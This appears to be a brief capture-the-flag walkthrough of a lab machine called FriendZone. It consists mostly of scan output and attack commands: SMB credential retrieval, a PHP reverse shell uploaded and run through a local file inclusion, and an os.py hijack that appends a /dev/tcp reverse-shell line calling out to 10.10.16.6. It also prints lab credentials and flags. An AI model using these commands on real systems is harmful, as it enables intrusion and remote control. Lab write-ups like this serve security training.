信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.10.123 | TCP:21,22,53,80,139,443,445 |
$ nmap -p- 10.10.10.123 --min-rate 1000 -sC -sV
bash
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
|_http-title: 404 Not Found
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)SMB
$ enum4linux 10.10.10.123
$ dig axfr friendzone.red @10.10.10.123
$ smbclient //10.10.10.123/general
smb: \> get creds.txt
username:admin
password:WORKWORKHhallelujah@#
HTTPS
# echo '10.10.10.123 friendzone.red administrator1.friendzone.red hr.friendzone.red uploads.friendzone.red '>>/etc/hosts
https://friendzone.red/
$ gobuster dir -u "https://administrator1.friendzone.red" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x txt,php -b 404,403 -t 50 -k
LFI
username:admin
password:WORKWORKHhallelujah@#
https://administrator1.friendzone.red/login.php
https://administrator1.friendzone.red/dashboard.php
$ smbclient //10.10.10.123/Development
smb: \> put php-reverse-shell.php
smb: \> put pspy32
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/php-reverse-shell
User.txt
ad2906258fb6679290609a6b243b6078
权限提升
$ cp /etc/Development/pspy32 /tmp
$ chmod +x /tmp/pspy32
$ /tmp/pspy32
$ cat /opt/server_admin/reporter.py
$ ls -la /usr/lib/python2.7/os.py
$ echo 'system("/bin/bash -c \"/bin/sh -i >& /dev/tcp/10.10.16.6/10033 0>&1\"")' >> /usr/lib/python2.7/os.py
Root.txt
253809a3fa48b78d59b7884199f37b35